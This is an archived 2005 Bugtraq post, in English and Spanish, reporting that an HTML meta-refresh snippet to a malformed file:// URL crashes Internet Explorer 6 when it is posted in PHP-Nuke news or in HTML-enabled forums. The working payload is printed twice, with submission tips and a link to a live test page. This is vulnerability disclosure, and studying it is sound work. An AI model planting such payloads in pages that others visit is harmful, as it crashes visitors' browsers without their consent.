lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050313224752.28595.qmail@www.securityfocus.com>
Date: 13 Mar 2005 22:47:52 -0000
From: WoRmZ Web <wormz.web@...il.com>
To: bugtraq@...urityfocus.com
Subject: html code include in phpnuke news crash IE 6




www.wormzweb.tk

------------------------------------------------------------------------
------------------------------------------------------------------------
ENGLISH
------------------------------------------------------------------------
------------------------------------------------------------------------

An html code include in the news in php-nuke (6.5 patched tested) make visitors with Internet Explorer 6 to crash. 

The code is the following:
******************************************************
<html> 

<head> 
<META HTTP-EQUIV="Refresh" CONTENT="5;URL=file:// :\"> 
</head> 

<body> 
</body> 

</html>

******************************************************

Submit news with this code without the admin verification, or submited by the admin will produce a error in Internet Explorer 6.x

This code can be included in forums or other places which allow html code with the same result.

You can read more about this in spanish:
http://usuarios.lycos.es/wormzweb/modules.php?name=Forums&file=viewtopic&t=15&sid=f30c8bf88b4028790c2b35239862c2c1

And you can test it (IE will crahs about 5 seconds after the web will be completed charged)in this link:
http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=164

------------------------------------------------------------------------
------------------------------------------------------------------------
SPANISH
------------------------------------------------------------------------
------------------------------------------------------------------------


Un código html incluido en las noticias de php-nuke (probado en la 6.5 parcheada) hace a los viitantes con Internet Explorer un error. (Se produce el cierre del navegador)


El código es el siguiente:
******************************************************
<html> 

<head> 
<META HTTP-EQUIV="Refresh" CONTENT="5;URL=file:// :\"> 
</head> 

<body> 
</body> 

</html>

******************************************************


Un usuario podría enviar una noticia incluyendo este codigo y sin la vereficación del administrador, o el propio envio por el administrador provocará que los visitantes de la web que usen Internet Explorer 6.x se les cierre la página y produzca error en el navegador

Este código puede ser incluido en foros y otros lugares que permitan código html con el mismo resultado.

Puedes leer mas sobre este bug en el siguente link:
http://usuarios.lycos.es/wormzweb/modules.php?name=Forums&file=viewtopic&t=15&sid=f30c8bf88b4028790c2b35239862c2c1

Puedes ver el codigo en uso y testear como funciona en el siguente link (Usando IE 6.x se cerrará el navegador pasados unos 5 segundos después de que la página se haya cargado completamente):

http://usuarios.lycos.es/wormzweb/modules.php?name=News&file=article&sid=164

________________________________________________________________________

Para mas info [::wormz::] www.wormzweb.tk


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ